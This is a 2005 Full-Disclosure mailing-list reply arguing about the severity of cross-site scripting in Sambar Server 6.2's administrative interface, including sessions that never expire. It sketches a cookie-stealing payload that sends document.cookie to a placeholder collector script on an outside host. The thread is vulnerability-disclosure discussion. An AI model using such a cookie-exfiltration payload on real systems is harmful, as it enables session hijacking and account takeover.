Re: XSS in Sambar Server version 6.2
From: jamie fisher <contact_jamie_fisher () yahoo co uk>
Date: Tue, 24 May 2005 21:30:13 +0100 (BST)
"A user can input a specially crafted script that when rendered by the
Hopefully you can explain:
"Multiple XSS found in the administrative interface."
This kind of pre-supposes the idea that a user has access to the administrative interface. The tests I ran were purely looking at what somebody with privileged rights could have effected within the application. For clarification, a user is by default somebody who is "identified" and then "authorised" to the system. In the case of Sambar Server version 6.2 this is done through the mandatory access control of username and password. The system in this case is the "administrative interface".
Granted, the XSS is a very low level vulnerability. However, combine the XSS with the ability to (document.cookie) and a document.location="http://domain.com/cookiecollector.pl" which logs the user's cookie, then this becomes more of an issue. Incidentally, did you know the application does not expire session states, i.e., if I log off or kill my session with the browser or otherwise and a miscreant (somebody who uses a Lynx browser), e.g. you, conspires to obtain my user identity - in this case we're using the example of the cookie - then this issue certainly becomes a high level one.
From personal experience I know you've run across plenty of XSS issues before; we've both discussed where we've collided in previous job roles. I guess, in a nutshell, it shows how little input/output validation is occurring throughout the application and what a user, if so inclined, can force the application into rendering. But really, I used to point out input/output validation issues to you along with the other stuff you used to miss in your web application pen tests.
P.S. There'll be plenty of other issues (other than XSS) I'll publish re: Sambar Server 6.2. I haven't got a problem if you would like to work with me in researching bugs/problems/issues. It's just a matter of trying to work with the vendor to help find and understand the issues/apply a patch. And btw, this isn't a personal attack against you either =)
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/